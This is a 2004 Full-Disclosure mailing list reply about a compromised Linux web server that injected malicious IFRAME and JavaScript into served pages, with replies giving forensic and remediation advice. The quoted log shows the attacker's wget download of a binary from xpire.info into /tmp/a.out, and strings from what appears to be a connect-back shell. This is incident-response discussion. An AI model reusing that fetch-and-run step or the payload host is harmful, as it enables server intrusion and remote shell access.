lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <6ec88adc0410241101520dc90@mail.gmail.com>
From: KKadow at gmail.com (Kevin)
Subject: xpire.info & splitinfinity.info - exploits in the wild

On Sun, 24 Oct 2004 13:47:04 +0200, Elia Florio <eflorio@...aster.it> wrote:
> Hi list,
> i'm doing some analysis on a Linux-Mandrake 9.0 web server
> of a person that was compromised in October.
> In this host now it's installed a special trojan that insert a
> malicious <IFRAME> tag into every served .PHP page.
. . .
> I've found inside Apache log that the hacker break-in inside the machine
> using an overflow and injecting an executable /tmp/a.out via "qmail-inject".

I'm not sure that qmail-inject isn't a red herring?  The actual
download looks like 'wget' was used.

> These are the suspicious log lines :
> 
> [Sun Oct  3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation
> fault (11)
> [Sun Oct  3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation
> fault (11)
> [Sun Oct  3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation
> fault (11)
> [Mon Oct  4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO"
> <angdimar@...oo.it>
> [Mon Oct  4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation
> fault (11)
> [Mon Oct  4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation
> fault (11)
> [Tue Oct  5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation
> fault (11)
> qmail-inject: fatal: unable to parse this line:
> To: Drugo:Lebowski@...ero.it
> sh: -c: option requires an argument
> --15:50:07--  http://xpire.info/cli.gz
>           => `/tmp/a.out'
> Resolving xpire.info... fatto.
> Connecting to xpire.info[221.139.50.11]:80... connected.HTTP richiesta
> inviata, aspetto la risposta... 200 OK
> Lunghezza: 19,147 [text/plain]
> 
>    0K .......... ........                                   100% 9.97K
> 
> 15:50:13 (9.97 KB/s) - `/tmp/a.out' salvato [19147/19147]
> 
> [Fri Oct  8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation
> fault (11)
> [Sat Oct  9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation
> fault (11)
> 
> Tryin a WGET of http://xpire.info/cli.gz , I get an ELF executable for
> Linux,
> possible containing a ConnectBack shell. Inside this ELF file you can grep
> these strings:
> 
> Usage:  %s host port
> pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx /dev/pty /dev/tty sh -i Can't
> fork pty, bye!
> Fuck you so
> /bin/sh No connect
> Looking up %s... Failed!
> OK
> %u Connect Back
> 
> I don't know if the hacker installs in this machine a rootkit, but the check
> of md5sum of
> ls, lsof, ps, netstat binaries with other ones from a clean Mandrake distr.
> was good.......

I assume you used a bootable CD on the infected machine to do the checksums?


> The main problem is finding how the Apache Server (or PHP) was altered by
> the hacker,
> because every user that connects to this host now, could be infected by
> several HTML/IE recent exploits.

Check the httpd.conf (and other apache configuration files) for any
changes, and also the contents of each module loaded.  It's also
possilble, but less likely, that the injection is done in a kernel
module.


> Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a
> random way??)
> web server inserts a special javascript between HTTP-Header and served page.

Sounds like a good time to replace the entire server with a fresh build.


Kevin


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ